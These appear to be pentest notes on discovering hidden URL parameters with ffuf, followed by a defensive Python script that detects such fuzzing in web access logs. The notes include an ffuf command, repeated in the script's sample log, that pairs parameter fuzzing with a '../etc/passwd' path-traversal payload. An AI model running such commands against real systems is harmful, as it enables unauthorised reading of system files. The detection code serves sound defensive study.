Parameter Enumeration

We can discover hidden (undocumented) parameters accepted by a URL by fuzzing the parameter name.

Parameter Fuzzing

We can use ffuf to fuzz for parameter names, together with the SecLists parameter-name wordlist. A hit shows up as a response that differs from the baseline (status code or response size).

In this example nothing was found except file.php, which returned a blank page. What do we do next? Fuzz for hidden parameters.

ffuf -u '10.10.14.89/console/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
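From the defender's side, a parameter-name fuzzing run like the one above leaves a distinctive trace in the web server access log: one client hitting the same path with many distinct query parameter names in a short span, often carrying the same payload in every request. The following Python script is an added example (not part of the original notes or of ffuf/SecLists) that parses combined-format access log lines and flags clients that exceed a threshold of distinct parameter names per path, counting traversal-style values alongside. The log lines, IPs and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Minimal parser for the Apache/nginx combined log format (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Raw and URL-encoded forms of "../" style path traversal segments.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f)', re.IGNORECASE)


def parse_line(line):
    """Parse one access log line into ip, path, parameter names, traversal flag and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    params = [name for name, _ in parse_qsl(parts.query, keep_blank_values=True)]
    query_decoded = unquote(parts.query)
    return {
        'ip': m.group('ip'),
        'path': parts.path,
        'params': params,
        'traversal': bool(TRAVERSAL_RE.search(parts.query) or TRAVERSAL_RE.search(query_decoded)),
        'status': int(m.group('status')),
    }


def detect_param_fuzzing(lines, threshold=10):
    """Flag (ip, path) pairs that used at least `threshold` distinct query parameter names.

    Returns a list of dicts with the client IP, path, number of distinct parameter
    names seen, and how many of that client's requests carried a traversal payload.
    """
    names_seen = defaultdict(set)
    traversal_hits = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec['ip'], rec['path'])
        names_seen[key].update(rec['params'])
        if rec['traversal']:
            traversal_hits[key] += 1
    findings = []
    for (ip, path), names in names_seen.items():
        if len(names) >= threshold:
            findings.append({
                'ip': ip,
                'path': path,
                'distinct_params': len(names),
                'traversal_requests': traversal_hits[(ip, path)],
            })
    return findings


# Constructed sample log: one client cycling parameter names against file.php
# with a traversal payload, plus two ordinary requests from another client.
FUZZ_NAMES = ['id', 'page', 'file', 'path', 'user', 'name',
              'q', 'action', 'debug', 'url', 'token', 'lang']
SAMPLE_LOG = [
    f'10.0.0.5 - - [10/Oct/2023:13:55:{i:02d} +0000] '
    f'"GET /console/file.php?{name}=../../../../../etc/passwd HTTP/1.1" 200 0'
    for i, name in enumerate(FUZZ_NAMES)
] + [
    '192.168.1.20 - - [10/Oct/2023:13:56:01 +0000] "GET /console/file.php?id=5 HTTP/1.1" 200 312',
    '192.168.1.20 - - [10/Oct/2023:13:56:04 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == '__main__':
    for finding in detect_param_fuzzing(SAMPLE_LOG):
        print(finding)
```

Grouping by (client, path) rather than by client alone keeps a busy but legitimate client with many pages from tripping the threshold; the traversal count is a separate signal so that a pure name-enumeration run without a payload is still reported.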